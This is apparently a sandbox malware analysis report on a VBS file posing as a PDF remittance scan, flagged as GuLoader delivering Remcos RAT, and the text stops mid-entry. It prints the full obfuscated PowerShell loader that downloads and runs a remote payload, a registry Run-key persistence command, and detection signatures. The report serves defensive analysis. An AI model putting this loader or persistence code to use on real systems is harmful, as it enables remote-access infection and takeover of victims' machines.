Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REMIT_SCAN_00008917738378282733(PDF).vbs

Overview

General Information

Sample name:REMIT_SCAN_00008917738378282733(PDF).vbs
Analysis ID:1625389
MD5:e4db4e95f7490f85d6b5c611cf3e5f7d
SHA1:e914f253cefd81c3e684183a0b4171dbb7d3df86
SHA256:658bec8cf1deb44a7d98b8d74e9b8361e5b85e19579d679565e057788358091c
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Queries memory information (via WMI often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 844 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 6212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Rdje$progrLMetroOSkeokvHungrgDiaraeAn iaNUn ern ylase Bosum ,remG Fa tASkru.N UnmogVesicES.lloN idssE');Strejflyset ($Gavmildes);Strejflyset (Krigskunst ' alc$PrecaBUdligl MaurgDimiteHyperdM.croa B,rdlStatseshutonIlleg9Diama0Godma.Pre,lH GaneeMorala eldodScoureGoto.rH nfrsZoogl[ Di c$ Bl.md.onole Moder ,irsmTnk,muIndsmtGraylaLu,sutInculi Pulpo Ko.onperub]Towa =Vent.$Dynaso esiluSaalatSkmmeyOve.seg abblOoph,pReligs');$Sensorers=Krigskunst '.andi$ oslaBsuperlZannygCreateTelegdAbbedaProgrl,uropeGenevntudse9Haarb0 Swan.KolorD onceoCurumw rundnCent lhypopoUndifa orbrdBurghFAktani ephlSilkweKorne( Fdse$DispaTVejtrrSubv eEquindpesewjStabeeCarciiPrevinunnessFact.t empoaIn sknAmbrasO ervbHofteeTuschvBryggiForgilDisc l LempiVic dn Uhlagheliosfreds,Hypop$SvagsUDrejenNonshdUkonte ourcrDatelvW.odyiPyru.sMindseRe ssrSvovl)';$Underviser=$Vandomraade;Strejflyset (Krigskunst 'Fortr$B shwgSpeciL,kelco Plagbfo ivaSkovflKvste:Bi,man dspiOLivegn TorsaKasalnIrrita asselOperaO VotaG umbeICara,CHeftiaSygeflskovp=Rodek( rchpTNoninE kr.vsPletsT Lyp.-S,faePl wboACr.tiT JernHBurba pids$ kemuAk deN ForpdProceE MaanrSceptvSvabiIMinersU stieGleekRUdjvn)');while (!$Nonanalogical) {Strejflyset (Krigskunst ' ulla$Entosg Burgl rec oSammebJemmya J dglEater: ,skeS AnaecGlaneaReastlSmgtedBahamb.arsee TronrVotarr St syTekst=Extra$ eropT PerirCo.ubuNonastDlgedm nboouUd adnAngeldC nteeLonchs') ;Strejflyset $Sensorers;Strejflyset (Krigskunst 'Evele[Un,foTScholHExi,irKosseeLumpiAP,otuDFrikaISte,sN ChopGM seu.ErythtPcfdeHFleshR Gennese ieaVin cd tylo]Uplea:Sjusk:I dspSUnconLHydroe,onprERomanPAfli (Rad,o4 T rm0 Lage0Forsy0Prece)');Strejflyset (Krigskunst 'Ar iv$sn.ekG SwarlVomitO nsavBByt eAInv rl endi: findnZoophoDishwN InitA SupeNSubjeAFunktL ebeORentegErklriMammuCGips aFora lPulli=Mort ( kilt H lpEtyttes YahaTBlkha- RedrPPa.taAKa.katSul eh Ronn H ns$ aftuuRigsbn Vrnedordbie fodsRHorniVL fehi.kelnSM ndve Burhr Idio)') ;Strejflyset (Krigskunst 'Bakk,$ ParagDominlc teroWe.woB af iaGo.awL t,in:ProbenEkspoEUnassU fgrfRPersiiAdaptlR mase BeneM SnerAAper = Mogb$Soffig Sub.l ,ygoo SkylbTurria SagiLDd an:InstisPizzaU GamorSwolnm Af oUUnpolLFosfoE Roerr PalaSEfter+Bi sk+Glowu% F sc$SydslVElon ADybvaNCa.cedUnproDS,edvYAnaglbUnderDLibelESundhnGrsens Ge e.Hy ercDeva oTrachU .fknNSuffrT') ;$Tredjeinstansbevillings=$Vanddybdens[$Neurilema]}$Occipitallynsucken=314281;$Overlder=32250;Strejflyset (Krigskunst 'R lat$St.blG cy,nlp.pilODyresbRun la ArmhlFluxi:aftesOUd,odvScreeEUninhR AaerCUsmido vasimOffi.pListeEOplg,tUrinei GageTSpoo ITemaeONoctinAlli Afpre=Juste eart.gHomoge PosttEarli-Naarec Nikoolev,enV ctutbruseEManchnKu sptBestr Mets$ Scl uBrisan Lip dTetrae armlr UncuvEnforI Temps onmeeInt,rr');Strejflyset (Krigskunst ' V rd$E.erggB pril .reeo afk.bsemifa.raunlGens.: SpriVTrayaeV derjUndfalMu laeDagdrd emiseIschar,ilhreBegrin umbs B,ba Ant m=Kugle Cuart[BilabSCho eySkemasUndertUbef.eOvermmRevid.AugosC SpiroWhatnnCo plvFarvee YoldrClam tRent,]E sfo:Cardi:,asseF RifbrEthnooCentemO.erqBCox oaSid,ts UdtaeSinds6 Betr4 JernS,ersotRo inrAmperiStivenDatabgDem,n(gigan$KatedOGentlvhastveCountrra.ikc Tot oMiddlmFedtepCauloeUralit StraiFlad,tSauroiInteroHumannAnven)');Strejflyset (Krigskunst 'Slaab$BagatGBjergl,orklO OmstBKjolea SyneLYelpe:s,outf a.err ErotySanseSRivereblephdViki I Ark.SL.vnekBoligeCowp nBlasfE BrossS.ole Aesc =Samsv Tru,k[ Bhi sUgedayKontisNavneTjulolESalatmBo be.C,rnptMountEWhereX Mal tCyath. ilkaeAfb,nnSimulcArgumOBlooddSemihI,enteN ramGNonho]Paake: ers:Lith aEncepsUnderCOxim.IMand.IElite.A umiG edigEO nittAas.eSLocarT InterAlterIInf kNknip GU dve(turbo$ PrmivTilspEMastiJOdontLDryppetermiDReserEBritsR LindeirettnNu seSstrep)');Strejflyset (Krigskunst 'Somap$ LazugA.klalindt,OSpeciBRagsoA VomelHobby:in.lelSkibsNTlas GDatafsAnthrEHovedLH,yessCent,Fmagn UReserlBrnegdBrahmtcolor=Versi$ PostF Malfr re oyutilnsChrisE w,ckD Be.riDeko,sNonnakHjertETri.dn Pla.eDunkesBomme.Gratus CrepuTi.esbFo,etS La etEichwRRea tiRelatNTog.eG Indk(ga,el$FjumroSpaanCKritiCWi.teIFiskePAerogISter t ImmeA pbrlRdg,dl F otyHvepsnBachesKart u AmyrCBondekPreexE MoniNBetal, Swin$S eciOcub cvfourrEDim.nrBiog Lacr ddHnsleEHa sfR Au a)');Strejflyset $Lngselsfuldt;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • powershell.exe (PID: 3592 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Rdje$progrLMetroOSkeokvHungrgDiaraeAn iaNUn ern ylase Bosum ,remG Fa tASkru.N UnmogVesicES.lloN idssE');Strejflyset ($Gavmildes);Strejflyset (Krigskunst ' alc$PrecaBUdligl MaurgDimiteHyperdM.croa B,rdlStatseshutonIlleg9Diama0Godma.Pre,lH GaneeMorala eldodScoureGoto.rH nfrsZoogl[ Di c$ Bl.md.onole Moder ,irsmTnk,muIndsmtGraylaLu,sutInculi Pulpo Ko.onperub]Towa =Vent.$Dynaso esiluSaalatSkmmeyOve.seg abblOoph,pReligs');$Sensorers=Krigskunst '.andi$ oslaBsuperlZannygCreateTelegdAbbedaProgrl,uropeGenevntudse9Haarb0 Swan.KolorD onceoCurumw rundnCent lhypopoUndifa orbrdBurghFAktani ephlSilkweKorne( Fdse$DispaTVejtrrSubv eEquindpesewjStabeeCarciiPrevinunnessFact.t empoaIn sknAmbrasO ervbHofteeTuschvBryggiForgilDisc l LempiVic dn Uhlagheliosfreds,Hypop$SvagsUDrejenNonshdUkonte ourcrDatelvW.odyiPyru.sMindseRe ssrSvovl)';$Underviser=$Vandomraade;Strejflyset (Krigskunst 'Fortr$B shwgSpeciL,kelco Plagbfo ivaSkovflKvste:Bi,man dspiOLivegn TorsaKasalnIrrita asselOperaO VotaG umbeICara,CHeftiaSygeflskovp=Rodek( rchpTNoninE kr.vsPletsT Lyp.-S,faePl wboACr.tiT JernHBurba pids$ kemuAk deN ForpdProceE MaanrSceptvSvabiIMinersU stieGleekRUdjvn)');while (!$Nonanalogical) {Strejflyset (Krigskunst ' ulla$Entosg Burgl rec oSammebJemmya J dglEater: ,skeS AnaecGlaneaReastlSmgtedBahamb.arsee TronrVotarr St syTekst=Extra$ eropT PerirCo.ubuNonastDlgedm nboouUd adnAngeldC nteeLonchs') ;Strejflyset $Sensorers;Strejflyset (Krigskunst 'Evele[Un,foTScholHExi,irKosseeLumpiAP,otuDFrikaISte,sN ChopGM seu.ErythtPcfdeHFleshR Gennese ieaVin cd tylo]Uplea:Sjusk:I dspSUnconLHydroe,onprERomanPAfli (Rad,o4 T rm0 Lage0Forsy0Prece)');Strejflyset (Krigskunst 'Ar iv$sn.ekG SwarlVomitO nsavBByt eAInv rl endi: findnZoophoDishwN InitA SupeNSubjeAFunktL ebeORentegErklriMammuCGips aFora lPulli=Mort ( kilt H lpEtyttes YahaTBlkha- RedrPPa.taAKa.katSul eh Ronn H ns$ aftuuRigsbn Vrnedordbie fodsRHorniVL fehi.kelnSM ndve Burhr Idio)') ;Strejflyset (Krigskunst 'Bakk,$ ParagDominlc teroWe.woB af iaGo.awL t,in:ProbenEkspoEUnassU fgrfRPersiiAdaptlR mase BeneM SnerAAper = Mogb$Soffig Sub.l ,ygoo SkylbTurria SagiLDd an:InstisPizzaU GamorSwolnm Af oUUnpolLFosfoE Roerr PalaSEfter+Bi sk+Glowu% F sc$SydslVElon ADybvaNCa.cedUnproDS,edvYAnaglbUnderDLibelESundhnGrsens Ge e.Hy ercDeva oTrachU .fknNSuffrT') ;$Tredjeinstansbevillings=$Vanddybdens[$Neurilema]}$Occipitallynsucken=314281;$Overlder=32250;Strejflyset (Krigskunst 'R lat$St.blG cy,nlp.pilODyresbRun la ArmhlFluxi:aftesOUd,odvScreeEUninhR AaerCUsmido vasimOffi.pListeEOplg,tUrinei GageTSpoo ITemaeONoctinAlli Afpre=Juste eart.gHomoge PosttEarli-Naarec Nikoolev,enV ctutbruseEManchnKu sptBestr Mets$ Scl uBrisan Lip dTetrae armlr UncuvEnforI Temps onmeeInt,rr');Strejflyset (Krigskunst ' V rd$E.erggB pril .reeo afk.bsemifa.raunlGens.: SpriVTrayaeV derjUndfalMu laeDagdrd emiseIschar,ilhreBegrin umbs B,ba Ant m=Kugle Cuart[BilabSCho eySkemasUndertUbef.eOvermmRevid.AugosC SpiroWhatnnCo plvFarvee YoldrClam tRent,]E sfo:Cardi:,asseF RifbrEthnooCentemO.erqBCox oaSid,ts UdtaeSinds6 Betr4 JernS,ersotRo inrAmperiStivenDatabgDem,n(gigan$KatedOGentlvhastveCountrra.ikc Tot oMiddlmFedtepCauloeUralit StraiFlad,tSauroiInteroHumannAnven)');Strejflyset (Krigskunst 'Slaab$BagatGBjergl,orklO OmstBKjolea SyneLYelpe:s,outf a.err ErotySanseSRivereblephdViki I Ark.SL.vnekBoligeCowp nBlasfE BrossS.ole Aesc =Samsv Tru,k[ Bhi sUgedayKontisNavneTjulolESalatmBo be.C,rnptMountEWhereX Mal tCyath. ilkaeAfb,nnSimulcArgumOBlooddSemihI,enteN ramGNonho]Paake: ers:Lith aEncepsUnderCOxim.IMand.IElite.A umiG edigEO nittAas.eSLocarT InterAlterIInf kNknip GU dve(turbo$ PrmivTilspEMastiJOdontLDryppetermiDReserEBritsR LindeirettnNu seSstrep)');Strejflyset (Krigskunst 'Somap$ LazugA.klalindt,OSpeciBRagsoA VomelHobby:in.lelSkibsNTlas GDatafsAnthrEHovedLH,yessCent,Fmagn UReserlBrnegdBrahmtcolor=Versi$ PostF Malfr re oyutilnsChrisE w,ckD Be.riDeko,sNonnakHjertETri.dn Pla.eDunkesBomme.Gratus CrepuTi.esbFo,etS La etEichwRRea tiRelatNTog.eG Indk(ga,el$FjumroSpaanCKritiCWi.teIFiskePAerogISter t ImmeA pbrlRdg,dl F otyHvepsnBachesKart u AmyrCBondekPreexE MoniNBetal, Swin$S eciOcub cvfourrEDim.nrBiog Lacr ddHnsleEHa sfR Au a)');Strejflyset $Lngselsfuldt;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • msiexec.exe (PID: 1616 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 1400 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4780 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\abios.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.128210723875.0000000009E7D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: powershell.exe PID: 6212JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 6212INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x238e54:$b2: ::FromBase64String(
        • 0x455ee:$s1: -join
        • 0x47297:$s1: -join
        • 0xadb57:$s1: -join
        • 0xbac2c:$s1: -join
        • 0xbdffe:$s1: -join
        • 0xbe6b0:$s1: -join
        • 0xc01a1:$s1: -join
        • 0xc23a7:$s1: -join
        • 0xc2bce:$s1: -join
        • 0xc343e:$s1: -join
        • 0xc3b79:$s1: -join
        • 0xc3bab:$s1: -join
        • 0xc3bf3:$s1: -join
        • 0xc3c12:$s1: -join
        • 0xc4462:$s1: -join
        • 0xc45de:$s1: -join
        • 0xc4656:$s1: -join
        • 0xc46e9:$s1: -join
        • 0xc494f:$s1: -join
        • 0xc6ae5:$s1: -join
        Process Memory Space: powershell.exe PID: 3592JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 3592INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x3ffd4d:$b2: ::FromBase64String(
          • 0x13789d:$s1: -join
          • 0x13f928:$s1: -join
          • 0x38aaad:$s1: -join
          • 0x397b82:$s1: -join
          • 0x39af54:$s1: -join
          • 0x39b606:$s1: -join
          • 0x39d0f7:$s1: -join
          • 0x39f2fd:$s1: -join
          • 0x39fb24:$s1: -join
          • 0x3a0394:$s1: -join
          • 0x3a0acf:$s1: -join
          • 0x3a0b01:$s1: -join
          • 0x3a0b49:$s1: -join
          • 0x3a0b68:$s1: -join
          • 0x3a13b8:$s1: -join
          • 0x3a1534:$s1: -join
          • 0x3a15ac:$s1: -join
          • 0x3a163f:$s1: -join
          • 0x3a18a5:$s1: -join
          • 0x3a3a3b:$s1: -join
          Click to see the 1 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_6212.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_3592.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xc7e7:$b2: ::FromBase64String(
            • 0xb866:$s1: -join
            • 0x13a80:$s3: reverse
            • 0x5012:$s4: +=
            • 0x50d4:$s4: +=
            • 0x92fb:$s4: +=
            • 0xb418:$s4: +=
            • 0xb702:$s4: +=
            • 0xb848:$s4: +=
            • 0x15fe7:$s4: +=
            • 0x16067:$s4: +=
            • 0x1612d:$s4: +=
            • 0x161ad:$s4: +=
            • 0x16383:$s4: +=
            • 0x16407:$s4: +=
            • 0xc087:$e4: Get-WmiObject
            • 0xc276:$e4: Get-Process
            • 0xc2ce:$e4: Start-Process
            • 0x16c8b:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4868, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", ProcessId: 844, ProcessName: wscript.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Motorskib
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD 